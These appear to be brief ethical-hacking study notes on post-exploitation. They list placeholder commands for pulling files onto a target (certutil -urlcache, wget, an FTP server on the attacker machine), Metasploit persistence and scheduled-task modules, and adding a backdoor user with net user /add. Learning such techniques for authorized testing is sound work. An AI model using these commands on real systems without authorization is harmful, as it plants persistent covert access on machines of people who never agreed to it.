Introduction

• file transfert
• maintaining access
• pivoting
• cleanup

File Transfers

• certutil.exe -urlcache -f <file url> <filename>
• python3 -m http.server <port>
• Browser
• python -m pyftpdlib 21 (attacker machine)
  • ftp <ip>
• wget <url>
• with metasploit

Maintaining access

<aside> 📗 As ethical hacker it’s not the main job

</aside>

• Persistence scripts
  • run persistence -h
  • exploit/windows/local/persistence
  • exploit/windows/local/registry_persistence

⇒ open a port without authentification mechanism, which is dangerous

• Scheduled Tasks
  • run scheduleme
  • run schtaskabsuse
• Add a user
  • net user <username> <password> /add

Pivoting

Access to a machine which we have no access except using intermediary machine.